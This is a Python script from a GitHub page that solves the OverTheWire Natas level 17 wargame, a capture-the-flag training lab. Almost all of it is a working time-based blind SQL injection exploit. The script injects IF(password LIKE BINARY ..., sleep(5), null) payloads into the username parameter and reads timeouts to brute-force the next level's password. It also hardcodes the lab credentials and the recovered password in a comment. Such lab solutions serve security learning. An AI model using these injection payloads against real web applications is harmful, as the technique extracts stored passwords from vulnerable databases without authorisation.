-
Notifications
You must be signed in to change notification settings - Fork 0
/
Natas17-BlindSQLiTimeAttack.py
63 lines (50 loc) · 2.12 KB
/
Natas17-BlindSQLiTimeAttack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# coding=utf-8
import base64
import requests
USERNAME = 'natas17:'.encode()
PASSWORD = '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'.encode()
URL = 'http://natas17.natas.labs.overthewire.org'
CHARS = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
NEXT_LEVEL_PASSWORD = ''
# Output:\n<pre>\n</pre>
def connect():
global headers
base_encoded_auth = base64.b64encode(USERNAME + PASSWORD).decode('utf-8')
print(base_encoded_auth) # bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
headers = {'Authorization': 'Basic {0}'.format(base_encoded_auth)}
response = requests.get(URL, headers=headers)
assert (response.status_code != requests.codes.ok, "Can't connect")
# import ipdb;ipdb.set_trace()
# the_page_output = response.text
# print(the_page_output)
def select_chars():
parsed_chars = ''
for char in CHARS:
try:
response = requests.get(
URL + '?username=natas18" AND IF(password LIKE BINARY "%' + char + '%",sleep(5), null) %23', timeout=1,
headers=headers)
# print(response.text)
except requests.exceptions.Timeout:
parsed_chars += char
print('Characters Used: ' + parsed_chars)
print('Starting brute force...')
return parsed_chars
def brute_force(selected_chars, next_level_password):
# Assuming password is 32 characters long
for i in range(32):
for char in selected_chars:
# SQL injection #2
try:
req = requests.get(
URL + '?username=natas18" AND IF(password LIKE BINARY "' + next_level_password + char + '%", sleep(5), null) %23',
timeout=1,
headers=headers) # timeout waits a second before assuming sleep has been triggered
except requests.exceptions.Timeout:
next_level_password += char
print('Password: ' + next_level_password + '*' * int(32 - len(next_level_password)))
break
connect()
selected_chars = select_chars()
brute_force(selected_chars, NEXT_LEVEL_PASSWORD)
print('Done') # xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP